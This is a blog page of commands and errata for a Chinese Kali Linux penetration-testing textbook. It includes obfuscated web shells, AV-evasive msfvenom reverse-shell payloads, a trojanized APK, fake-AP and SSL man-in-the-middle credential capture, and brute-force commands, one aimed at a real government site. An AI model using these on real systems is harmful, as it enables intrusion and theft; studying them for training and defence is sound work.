Kali Linux 滲透測試工具(第3版) 指令清單及勘誤表

連結勘誤表    Kali 2020.1 版補充說明
指令或網址清單

第1章

第2章

樹莓派Kali映像檔

建立虛擬機

VirtualBox安裝程式

Kali環境設定

安裝VMWare Tools
apt update
apt -y reinstall open-vm-tools-desktop fuse
reboot

修正OVT失效的指令碼

/usr/local/sbin/reOVT.sh」的指令碼
#!/bin/bash
systemctl stop run-vmblock\\x2dfuse.mount
killall -q -w vmtoolsd
systemctl start run-vmblock\\x2dfuse.mount
systemctl enable run-vmblock\\x2dfuse.mount
vmware-user-suid-wrapper vmtoolsd -n vmusr 2 > /dev/null
vmtoolsd -b /var/run/vmroot 2 > /dev/null

安裝Firefox
echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
apt update
apt install firefox-mozilla-build

安裝Chrome
apt update
cd /tmp/
wget -c https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
dpkg -i google-chrome-stable_current_amd64.deb
## 如果發生套件未滿足相依關依,請先執行「apt-get install -f」後,再重新執行步驟3.

修正Chrome無法以root身分執行問題
exec -a "$0" "$HERE/chrome" "$@" --user-data-dir --test-type --no-sandbox

Kali安裝於USB隨身碟
 下載KALI的USB映像檔
wget https://cdimage.kali.org/kali-2019.1a/kali-linux-2019.1a-amd64.iso

 燒錄USB映像檔
dd if=kali-linux-light-2.0-i386.iso of=/dev/sdb bs=512K


安裝VNC Server
 編輯/etc/systemd/system/tightvncserver.service
[Unit]
Description=TightVNC Server
After=sshd.service

[Service]
Type=dbus
ExecStart=/usr/bin/vncserver :1 -geometry 1280x800
User=root
Type=forking

[Install]
WantedBy=multi-user.target

 變更tightvncserver.service的擁有者與群組,以及檔案使用權限
chown root:root /etc/systemd/system/tightvncserver.service chmod 755 /etc/systemd/system/tightvncserver.service

安裝4G上網
 USB裝置的類型轉換對照表 編輯/etc/wvdial.conf
[Dialer E3272]
Phone = *99#
APN = internet
Username = username
Password = password
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0
Init3 = AT+CGDCONT=1, "IP","Internet"
Modem = /dev/ttyUSB0
Baud = 460800
Stupid Mode = 1

第3章

(無資料)

第4章

安裝Nessus

下載Nessus

註冊啟動碼
申請Nessus啟動碼

安裝OpenVAS

設定開機自動啟動
 編輯/etc/systemd/system/rc-local.service
[Unit]
Description=Execute on Booting
ConditionPathExists=/etc/rc.local

[Service]
Type=forking
ExecStart=/etc/rc.local start
StandardOutput=tty
RemainAfterExit=yes
SysVStartPriority=99

[Install]
WantedBy=multi-user.target

 變更rc-local.service的擁有者與群組,以及檔案使用權限
chown root:root /etc/systemd/system/rc-local.service
chmod 755 /etc/systemd/system/rc-local.service

 將rc-local.service設成開機自動執行
systemctl enable rc-local.service

 建立rc.local
#! /bin/sh -e

case "$1" in
    start)
        openvas-start
        ;;
    stop)
        openvas-stop
        ;;

    restart)
        openvas-start
        sleep 5
        openvas-stop
        ;;
    *)
        echo "Usage: /etc/rc.local {start | stop | restart}"
        exit 1
esac

exit 0

 變更rc.local的擁有者與群組,以及檔案使用權限
chown root:root /etc/rc.local
chmod 755 /etc/rc.local

安裝OWASP ZAP

下載OWASP ZAP

第5章

下載及掛載Metasploitable

下載Metasploitable VM映像檔
 將metasploitable2移植到VirtualBox
  轉換VMware映像檔為VirtualBox格式
"C:\Program Files\Oracle\VirtualBox\VBoxManage" clonemedium disk "D:\metasploitable-linux-2.0.0\Metasploitable2-Linux/Metasploitable.vhdx" "D:\metasploitable-linux-2.0.0\Metasploitable2-Linux\Metasploitable.vdi" --format VDI

利用iptables為模擬環境設置防火牆

iptables的封包流向圖

第6章

Google Hacking

GHDB:現成的Google Hacking語法

Shodan Shodan首頁

維基百科:國碼請參考

其他線上whois


利用漏洞資料庫


DNS轄區資料轉送

DNS Zone transfer範例網站

dnstracer

域名伺服器記錄類型列表

fierce

 header範例
GET / HTTP/1.0
User-Agent: Mozilla/5.0
Host:
Expect: <script src="https://ha.ckers.org/xss.js"></script>

DNSRecon

下載subdomains-top1mil.txt

 smtp-user-enum批次執行
for E in 'cat email.lst'
do
    swaks --to $E --server test-server.example.com --quit-after RCPT --hide-all
    [ $? -ne 0 ] && echo $E
done

收集SSL資訊

sslscan SSL線上掃描工具


第7章


第8章

Lynis

 載荷檔的範例一:payload01.txt
GET /foobar/index.php?file=TRAVERSAL HTTP/1.0
Host: www.qwertyfoobar.org
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.qwertyfoobar.org/main.php
Cookie: user=johndoe; abc=1379415096; file=TRAVERSAL; command=get

 載荷檔的範例二:payload02.txt
GET /unauthenticated/TRAVERSAL HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1

第9章

OWASP ZAP

ZAP 2.8.x頭載裝置顯示(HUD)

Burp Suite

表格 91:測試範例之帳號及密碼清單
用於uid

用於passw
檔名:user.lst

檔名:password.lst
admin
test
jsmith
user
john
merry
queen
king
damon

123456
12345
password
abc123
computer
qwerty
a1b2c3
123abc
admin
test
demo1234
user

BeEF

 漏洞網頁範例
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transistional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title></title>

<script src="http://192.168.1.106:3000/hook.js">></script>>
</head>>
<body>
<div style="font-size:16pt;color:red">This is BeEF test.</div>
</body>
</html>

XSSer

GET欄位注入
xsser -u 'http://192.168.18.133/dvwa/vulnerabilities/xss_r/?' -g 'name=XSS' --cookie 'security=low; PHPSESSID=fd833736f3ade65c56d557596e46c501' --auto --user-agent 'Mozilla/5.0'

POST欄位注入
xsser -u 'http://192.168.18.133/dvwa/vulnerabilities/xss_s/' -p 'txtName=XSS&mtxMessage=XSS&btnSign=Sign+Guestbook' --cookie 'security=low; PHPSESSID=fd833736f3ade65c56d557596e46c501' --auto --user-agent 'Mozilla/5.0' --follow-redirects --Dom

應用Proxy及偽造的Referer
xsser -i URLs.lst --proxy http://localhost:8118 --referer www.uu.com

自動注入攻擊載荷,以十六進制編碼
xsser -u http://host.com --auto --Hex -v --save

注入自定義的攻擊載荷
xsser -i urls.txt --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une

對第四階的40組網頁注入攻擊
xsser -c40 --Cw=4 -u "http://host.com"

POST欄位注入,並輸出統計資訊。
xsser -u "http://host.com" -p "/index.php?target=search&subtarget=top&searchstring=XSS" -s

簡單注入攻擊
xsser -u "http://host.com" -g "bs/?q=XSS" --Dos

多目標注入
xsser -i urls.lst --auto --timeout 20 --threads 16 --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s -v --Dos

建立含有XSS腳本gif圖檔
xsser --imx Picture.gif

GET欄位的外部載荷
xsser -u host.com -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

跨站追蹤(XST)參考資訊
XSSer參考範例一
XSSer參考範例二

第10章

(無資料)

第11章

SQLMap

攻擊crackme範例
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --dbs --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+ to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin& sendbutton1=Login" -p "LoginName" --batch
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --table -D bank --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+ to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin& sendbutton1=Login" -p "LoginName" --batch
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --columns -D bank -T user --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+ to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin& sendbutton1=Login" -p "LoginName" --batch

SQLninja

 編輯sqlninja.conf
gzip -d /usr/share/doc/sqlninja/sqlninja.conf.example.gz
cp /usr/share/doc/sqlninja/sqlninja.conf.example /root/sqlninja.conf

 GET請求的欄位注入之範例
--httprequest_start--
GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherp$
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418$
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/p$
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Connection: close
--httprequest_end--

 POST請求的欄位注入之範例
--httprequest_start--
POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://demo.testfire.net/bank/login.aspx
Cookie: ASP.NET_SessionId=5l023szuvchlvuezvur00d45; amSessionId=71241312664
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

uid=aaa';__SQL2INJECT__&passw=eeee&btnSubmit=Login
--httprequest_end--

HexorBase

下載Oracle Client for Linux」
下載cx_Oracle-5.2.tar.gz

第12章

hydra

 猜測Web表單式的登入帳號密碼
第一種格式:
hydra -L ~/user.lst -P ~/password.lst http-post-form://demo.testfire.net/doLogin:"uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"

第二種格式:
hydra -L ~/user.lst -P ~/password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"

 當hydra遇到中文字
hydra -l root -P pwds.lst www.tester.com:260 http-post-form "/cgi-bin/admin/sessmgr.cgi:user=^USER^&pwd=^PASS^&act=login&savepwd=1:\xe7\x99\xbb\xe5\x85\xa5\xe5\xa4\xb1\xe6\x95\x97"

patator

 http_fuzz模組
patator http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500

patator http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401

patator http_fuzz url=http://10.0.0.1/login.php method=POST body='userid=COMBO00&passw=COMBO01' 0=users.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in' -l /tmp/phpmysql

patator http_fuzz url=https://pdis.moj.gov.tw/U100/U102-1.aspx method=POST body='ctl00$ContentPlaceHolder1$txtIDN=FILE0&ctl00$ContentPlaceHolder1$ddlSYEAR=102' 0=/root/Downloads/ID_List.txt follow=1 accept_cookie=1 -x ignore:fgrep='目前未有符合條件'

 smtp_rcpt模組
patator smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt

patator smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt mail_from=bar@example.com -x ignore:fgrep='User unknown' -x retry:code=421

patator smtp_login host=10.0.0.1 user=FILE0@localhost password=FILE1 0=logins.txt 1=passw.txt

 smb_login模組
smb_login host=FILE0 0=hosts.txt user=COMBO10 password_hash=COMBO12:COMBO13 1=pwdump.txt

smb_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:fgrep=STATUS_ACCOUNT_LOCKED_OUT

 mssql_login模組
patator mssql_login host=10.0.0.1 user=sa password=FILE0 0=passwords.txt -x ignore:fgrep='Login failed for user'

 mysql_login模組
patator mysql_login host=10.0.0.1 user=COMBO00 password=COMBO01 0=userdata.txt -x ignore:fgrep='Access denied for user'

 FTP模組
patator ftp_login host=10.0.0.1 user=COMBO00 password=COMBO01 0=userdata.txt -x ignore:fgrep='Login incorrect'

ftp_login host=NET0 user=anonymous password=test@example.com 0=10.0.0.0/24

 Unzip模組
patator unzip_pass zipfile=file.zip password=FILE0 0=passwords.txt -x ignore:code!=0

 利用http_fuzz模組破解testfire登入帳密
patator http_fuzz url=http://demo.testfire.net/doLogin body="uid=FILE0&passw=FILE1&btnSubmit=Login" method=POST follow=1 accept_cookie=1 persistent=1 before_urls=http://demo.testfire.net/login.jsp 0=/root/user.lst 1=/root/password.lst -x ignore:fgrep="Login Failed"

Medusa

 cvs模組
medusa -M cvs -m DIR:/some_project。

 ftp模組
medusa -M ftp -h host -u username -p password

medusa -M ftp -h host -u username -p password -s

medusa -M ftp -h host -u username -p password -m MODE:EXPLICIT

 http模組
medusa -M http -m USER-AGENT:"g3rg3 gerg" -m DIR:/exchange/

medusa -M http -m CUSTOM-HEADER:"Cookie: SMCHALLENGE=YES"

 imap模組
medusa -M imap -m AUTH:PLAIN -m TAG:A01 -m DOMAIN:mydm -h host -u foo -p bar

medusa -M imap -m AUTH:NTLM -m DOMAIN:mydm -h host -u foo -p bar

medusa -M imap -m AUTH:NTLM -h host -u foo@mydm -p bar

medusa -M imap -m AUTH:LOGIN -h host -u 'mydm\\foo' -p bar

 mysql模組
medusa -M mysql -h 192.168.18.15 -u userId -p pAssw0rd

medusa -M mysql -h 192.168.18.15 -u userId -p 39b52a209cf03d62 -m PASS:HASH

 pcanywhere模組
medusa -M pcanywhere -h 192.168.18.15 -u userId -p pAssw0rd -m DOMAIN:mydm

 pop3模組
medusa -M pop3 -m MODE:AS400 -h 192.168.18.131 -U user.lst -P password.lst

medusa -M pop3 -m DOMAIN:hacker.com -h 192.168.18.131 -U user.lst -P password.lst

 postgres模組
medusa -M postgres -m DB:msf -h 127.0.0.1 -u msf -p msfpass

 rsh模組
medusa -M rsh -h 192.168.18.133 -U user.lst -p pass

 smbnt模組
medusa -M smbnt -h 192.168.18.131 -U users.lst -P password.lst

medusa -M smbnt -h 192.168.18.131 -U users.lst -P password.lst -m GROUP:mydm

medusa -M smbnt -h 192.168.18.131 -C pwdump.txt -m PASS:HASH -m GROUP:mydm

medusa -M smbnt -H hosts.txt -C pwdump.txt -U users.lst -m PASS:HASH

medusa -M smbnt -H hosts.txt -u administrator -p 92D887C8010492C2944E2DF489A880E4:7A2EDE4F51BC5A03984C6BA2C239CF63::: -m PASS:HASH

 smtp-vrfy模組
medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p hacker.com

 smtp模組
medusa -M smtp -m AUTH:NTLM -h 192.168.18.56 -U users.lst -P password.lst

medusa -M smtp -m EHLO:world -h 192.168.18.56 -U users.lst -P password.lst

 snmp模組
medusa -M snmp -m TIMEOUT:2 -m ACCESS:WRITE" -h 192.168.18.199 -U users.lst -P password.lst

ssh模組
medusa -M ssh -m BANNER:SSH-2.0-GOODMAN -h 192.168.18.131 -U users.lst -P password.lst

svn模組
medusa -M svn -m BRANCH:"svn://172.31.10.144/comm-lib" -h 172.31.10.144 -U users.lst -P password.lst

 telnet模組
medusa -M telnet -m MODE:AS400 -h 192.168.18.131 -U user.lst -P password.lst

 vnc模組
medusa -M vnc -m MAXSLEEP:120 -m DOMAIN:mydm -h 192.168.18.2 -U user.lst -P password.lst

 Web-form模組
medusa -h testasp.vulnweb.com -U ~/user.lst -P ~/password.lst -M web-form -m FORM-DATA:"post?tfUName=&tfUPass=" -m USER-AGENT:"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36" -m FORM:"/Login.asp?RetURL=%2FDefault%2Easp%3F" -m DENY-SIGNAL:"Invalid login!" -m CUSTOM-HEADER:"Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F"

rainbowCrack

彩虹表的基本原理
購買彩虹表

第13章

sslsniff

建立偽冒憑證
openssl req -config openssl.cnf -new -x509 -extensions v3_ca -keyout private/myca.key -out myca.crt -days 3650

openssl ca -config openssl.cnf -policy policy_anything -out mytest.crt -infiles mytest.csr

mkdir /usr/share/sslsniff/certs/spoofed_site/

cat mytest.crt mytest.key > /usr/share/sslsniff/certs/spoofed_site/mytest.pem


SSLsplit

使用OpenSSL建立CA私鑰ca.key和憑證ca.crt
建立x509v3ca.cnf。
[ req ] distinguished_name = reqdn [ reqdn ] [ v3_ca ] basicConstraints = CA:TRUE subjectKeyIdentifier = hash authorityKeyIdentifier = keyid:always,issuer:always


先產生CA私鑰(ca.key),再利用此私鑰簽署ca.crt憑證檔:
openssl genrsa -out ca.key 1024

openssl req -new -nodes -x509 -sha1 -out ca.crt -key ca.key -config x509v3ca.cnf -extensions v3_ca -subj '/O=SSLsplit Root CA/CN=SSLsplit Root CA/' -set_serial 0 -days 3650


iptables轉發使用者的流量
echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -F

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443


執行sslsplit代理
sslsplit -D -l /root/sslsplit/connections.log -S /root/sslsplit/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

Ghost Phisher

無線網卡選購資訊一
無線網卡選購資訊二

DNSChef

--file選項的檔案範例
[A]
mail.google.com.tw=192.168.18.133
mail.yahoo.com=192.168.18.133
*.google.com=192.168.18.130
*.yahoo.com=192.168.18.130

[AAAA]
mail.google.com.tw=fe80::20c:29ff:fef0:b63
mail.yahoo.com=fe80::20c:29ff:fef0:b63
*.google.com.com=fe80::20c:29ff:fef0:b61
*.yahoo.com=fe80::20c:29ff:fef0:b61

[MX]
*.google.com=mail.google.com.tw
*.yahoo.com=mail.yahoo.com

[NS]
*.google.com=ns1.google.com
*.yahoo.com=ns1.yahoo.com
*.google.com=ns2.google.com
*.yahoo.com=ns2.yahoo.com

[CNAME] # Queries for alias records
*.google.com.com=www.google.com
*.yahoo.com.com=w3.yahoo.com

[TXT]
*.google.com=This a fake GOOGLE Site!
*.yahoo.com=This a fake GOOGLE Site!

[PTR]
*.18.168.192.in-addr.arpa=google.com
*.18.168.192.in-addr.arpa=yahoo.com

[SOA]
; FORMAT: mname rname t1 t2 t3 t4 t5
*.google.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600
*.yahoo.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600

# 詳細範例可參考:https://github.com/iphelix/dnschef/blob/master/dnschef.ini

dnschef範例
dnschef --fakeip=192.168.18.130 --fakealias=www.google.com,tw.yahoo.com --interface 0.0.0.0 -q

dnschef.ini參考範例


第14章

通訊掩護

Windows版本stunnel
Windows版本HTTPTunnel

shellter

封裝plink.exe
cp /usr/share/windows-binaries/plink.exe /tmp/
shellter -a -f /tmp/plink.exe -p Meterpreter_Reverse_TCP --lhost 192.168.18.133 --port 4444 --junk

建立msfconsole反向連線監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.18.133
set LPORT 4444
run


Backdoor Factory 

安裝舊版Backdoor Factory
apt autopurge backdoor-factory
cd /usr/share/
git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
./install.sh
ln -s /usr/share/the-backdoor-factory/backdoor.py /usr/bin/backdoor-factory

一句話木馬

ASP的一句話木馬
<% If Request("l")<>"" Then ExecuteGlobal(Request("l")) %>

<% X=Request("l"):If X<>"" Then Execute(X) %>

<% execute(eval(chr(114) + chr(101) + chr(113) + chr(117) + chr(101) + chr(115) + chr(116))("L")) %>



aspx的一句話木馬
<%@ Page Language="Jscript"%>

<%eval(Request.Item["l"],"unsafe");%>

<%@ Page Language = Jscript %>

<%var/*-*-*/P/*-*-*/=/*-*-*/"e"+"v"+/*-*-*/"a"+"l"/*-*-*/+"("+"R"+"e"+/*-*-*/"q"+/*-*-*/"u"+/*-*-*/"e"/*-*-*/+"s"+/*-*-*/"t"+"[/*--*/"L"/*-*-*/]"+ ","+"\""+"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"+"\""+")";eval (/*--*/P/*-*-*/,/*--*/"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"/*--*/);%>



JSP的一句話木馬

<% if(request.getParameter("l")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("l"))).write(request.getParameter("m").getBytes()); %>


ASP實例一
dim fs, f, a

a="這邊放入要寫到a.asp的程式碼"

set fs=Server.CreateObject("Scripting.FileSystemObject")

set f=fs.OpenTextFile(server.MapPath("a.asp"),8,true,-1)

f.WriteLine(a)

f.Close

set f=nothing

set fs=nothing

上面程式碼先進行url encode,再傳送到 http://localhost?1=<編碼過的字串>

ASP實例二
dim fs,r

set fs=Server.CreateObject("Scripting.FileSystemObject")

Set R=fs.OpenTextFile(Server.MapPath("decode.asp"), 1)

do while R.AtEndOfStream = false

Response.Write(Server.HTMLEncode(R.ReadLine)+"
")

loop

set f=nothing

set fs=nothing

上面的程式碼進行url encode,再傳送到 http://localhost?1=<編碼過的字串>:
http://localhost/hole.asp?L=dim%20fs%2Cr%3Aset%20fs%3DServer.CreateObject(%22Scripting.FileSystemObject%22)%3ASet%20R%3Dfs.OpenTextFile(Server.MapPath(%22decode.asp%22)%2C%201)%3Ado%20while%20R.AtEndOfStream%20%3D%20false%3AResponse.Write(Server.HTMLEncode(R.ReadLine)%2B%22%3Cbr%3E%22)%3Aloop%3Aset%20f%3Dnothing%3Aset%20fs%3Dnothing%0A

第15章

msfvenom產製具保護作用的Payload

範例:
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe --platform Windows -a x86 -n 30 LHOST=192.168.158.134 LPORT=4444 > /tmp/game1.exe

msfvenom -p windows/shell_reverse_tcp -f raw -n 30 LHOST=192.168.158.134 LPORT=4444 | msfvenom -e x86/unicode_mixed -i 3 -b '\x00' -f raw -n 10 | msfvenom -e x86/call4_dword_xor-i 2 -b '\x00' -f exe --platform Windows -a x86 -n 30 > /tmp/game2.exe

第16章

aircrack-ng工具組

選擇適合aircrack的無線網卡一
選擇適合aircrack的無線網卡二
選擇適合aircrack的無線網卡三

airolib-ng
 範例:
airolib-ng LiteDb --stats           查詢資料庫狀態

airolib-ng LiteDb --clean all           清理廢棄的資料並緊縮空間

airolib-ng LiteDb --import essid ssidlist.txt   從文字檔匯入AP名稱

airolib-ng LiteDb --import passwd password.lst   從文字檔匯入密碼字典

airolib-ng LiteDb --batch           計算並儲存PMKs

airolib-ng LiteDb --verify all           驗證資料庫中的所有PMKs

airolib-ng LiteDb --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="Belle";'

airolib-ng LiteDb --sql 'select hex(pmk) from pmk where hex(pmk) like "%03AE9EF%"'

airolib-ng LiteDb --export cowpatty Belle cowexportofBelle.cow   將Belle的資料匯出成compatty格式的檔,以供cowpatty使用

airolib-ng LiteDb --import cowpatty cowexportoftest      從cowpatty格式的檔案(cowexportoftest)匯入AP的資料及PMKs

利用airbase與sslstrip部署偽AP

編輯/etc/dhcp/dhcpd.conf
# Sample configuration file for ISC dhcpd for Debian
#
ddns-update-style none;
log-facility local7;
default-lease-time 60;
max-lease-time 7200;

option subnet-mask 255.255.255.0;
option broadcast-address 192.168.99.255;
option routers 192.168.99.254;
option netbios-name-servers 192.168.99.254;
option domain-name-servers 8.8.8.8;


subnet 192.168.99.0 netmask 255.255.255.0 {
      range 192.168.99.100 192.168.99.200;
}

利用airbase與metasploit部署偽AP

 編輯/etc/karma.rc
# browser_autopwn 模擬一個Web站臺
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 192.168.99.254
setg AUTOPWN_PORT 55555
setg AUTOPWN_URI /
set LHOST 192.168.99.254
# 攻擊成功時接聽者
set LPORT 4444
set SRVPORT 55555
set URIPATH /
run

#pop3 抓取所有電子郵件請求
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run -j

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run -j

# ftp 抓取所有 ftp請求
use auxiliary/server/capture/ftp
run -j

# smtp 抓取所有 smtp請求
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run -j

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run -j

# http 抓取所有 http/https 請求
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run -j

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run -j


A終端機執行
airmon-ng check kill
airmon-ng start wlan0
airbase-ng -C 30 -e linksys -c 9 -v wlan0mon

B終端機執行
ifconfig at0 up 192.168.99.254 netmask 255.255.255.0
dhcpd -cf /etc/dhcp3/dhcpd.conf -at0

C終端機執行
iptables -t nat -F
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s 192.168.99.0/24 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 80 -j REDIRECT --to 80
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 443 -j REDIRECT --to 443
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 110 -j REDIRECT --to 110
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 25 -j REDIRECT --to 25
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 21 -j REDIRECT --to 21
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 465 -j REDIRECT --to 465
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 995 -j REDIRECT --to 995
msfconsole -q -r /etc/karma.rc

第17章

藍牙的科普知識

Bluesnarfer

AT Command參考資料

封裝funny.apk

msfvenom –p android/meterpreter/reverse_tcp -f raw -o ~/funny.apk LHOST=192.168.18.131 LPORT=4444

設置反向連線接聽環境

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.18.131
set LPORT 4444
run


將funny.apk傳送給目標主機

bluetooth-sendto --device=40:b8:37:96:d1:b5 ~/funny.apk

第18章

(無資料)

第19章

(無資料)

附錄

(無資料)

勘誤表  (回頁首)
頁數(行數) 修正後文字 修正前文字 修正說明
4-2(2) apt install locate apt locate 指令漏打「install」。感謝讀者指正。
4-11(11)將它改成下式:(主要修改如灰底粗體字部分)
ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=127.0.0.1 --mport=9390 --allow-header-host=192.168.18.143

修改後,執行下列二列指令:
systemctl daemon-reload
systemctl restart greenbone-security-assistant.service
將它改成下式:(主要修改如灰底粗體字部分)
ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=127.0.0.1 --mport=9390 --allow-header-host=192.168.18.143
讀者建議在修正ExecStart內容後,執行systemclt重新載入服務。
但筆者當初實驗,是修改後,關機重開,沒有想到重新載入服務。
9-55(1) 執行路徑: 03-Web程序\wpscan
      03-Web程序\CMS識別\wpscan
      03-Web程序\Web漏洞掃描\wpscan
      終端機執行 wpscan


語法:wpscan [OPTIONs] -u URL
執行路徑: 03-Web程序\webscan
      03-Web程序\CMS識別\webscan
      03-Web程序\Web漏洞掃描\webscan
      終端機執行 webscan

語法:webscan [OPTIONs] -u URL
指令名稱誤植為webscan
9-65(15) 語法:clusterd [OPTIONs] -i URL 語法:clusterd [OPTIONs] -u URL 誤將參數-i鍵成-u









. .

4 則留言:

  1. page 4-2
    chapter 4 apt locate --> apt install locate

    page 4-11

    4.2.4 /lib/systemd/system/greenbone-security-assistant.service 增加 --allow-header-host=IP 之後
    執行
    # systemctl daemon-reload
    # systemctl restart greenbone-security-assistant.service

    回覆刪除
    回覆
    1. 感謝您細心指正,尚請您不吝繼續指教!
      謝謝您!

      刪除
  2. 您好,我的環境是Win11,VMware Workstation 16,依據書中步驟安裝至圖2-28:將GRUB安裝在MBR後,出現無法建立MBR的錯誤訊息....請教您這要如何解決呢?謝謝您!

    回覆刪除
    回覆
    1. 您好,我沒有遇過這個問題,或許您可以利用Google搜尋出現的錯誤訊息,也許會有其他人和您遇到相同情況,說不定也伴隨著處理方法。

      刪除